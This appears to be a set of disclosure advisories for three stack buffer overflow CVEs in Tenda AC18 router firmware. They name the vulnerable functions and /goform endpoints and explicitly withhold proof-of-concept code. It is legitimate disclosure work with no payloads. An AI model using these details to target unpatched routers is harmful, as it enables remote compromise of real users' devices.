The function "initIpAddrInfo" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24165: Tenda/7.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/FUN_0007343c.

****CVE-2023-24169****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "FUN\_0007343c" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24169: Tenda/6.md at main · DrizzlingSun/Tenda

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/add_white_node.

****CVE-2023-24167****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "add\_white\_node" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

Drizzling\_Sun @KRlab

Tag

#buffer_overflow